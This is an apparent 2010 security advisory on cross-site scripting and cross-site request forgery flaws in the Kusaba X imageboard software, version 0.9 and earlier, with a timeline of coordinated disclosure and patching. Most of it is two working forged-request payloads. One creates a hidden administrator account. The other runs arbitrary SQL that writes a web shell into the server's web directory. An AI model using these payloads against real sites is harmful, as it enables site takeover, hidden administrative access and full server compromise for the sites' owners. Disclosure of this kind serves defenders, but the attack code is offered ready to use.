Kusaba X <= 0.9 XSS/CSRF vulnerabilities
Kusaba X suffers XSS and CSRF vulnerabilities that would allow an attacker to take over the web application and possibly the entire server (depending on the MySQL configuration). The XSS vulnerability is not required to exploit the CSRF but makes the proccess very easy.
These run rampent throughout the application. Here are two of the most severe but there's lots of fun to be had.
1. Add administrative accouts
<form action="http://example.chan/manage_page.php?action=staff&add" method="POST">
<input name="username" value="user123" />
<input name="password" value="pass123" />
<input name="type" value="1" />
2. Execute MySQL queries
<form action="http://example.chan/manage_page.php?action=sql" method="POST">
<input name="query" value="SELECT 'your-shell-here' INTO OUTFILE '/path/to/www';" />
Feb 9, 2010 - Reported to Kusaba X dev team.
Feb 15, 2010 - Kusaba X 0.9.1 released containing patch.
Feb 17, 2010 - Info released
~~Thanks to Sazpaimon
~~Greetz to the open source community